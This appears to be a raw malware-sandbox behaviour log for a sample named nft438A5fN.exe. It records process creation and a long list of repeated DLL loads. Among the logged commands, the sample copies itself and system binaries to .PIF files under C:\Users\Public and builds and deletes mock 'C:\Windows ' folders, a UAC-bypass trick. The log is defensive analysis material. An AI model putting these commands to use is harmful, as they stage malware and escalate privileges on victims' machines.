Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676
Source: unknown	Process created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe

Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
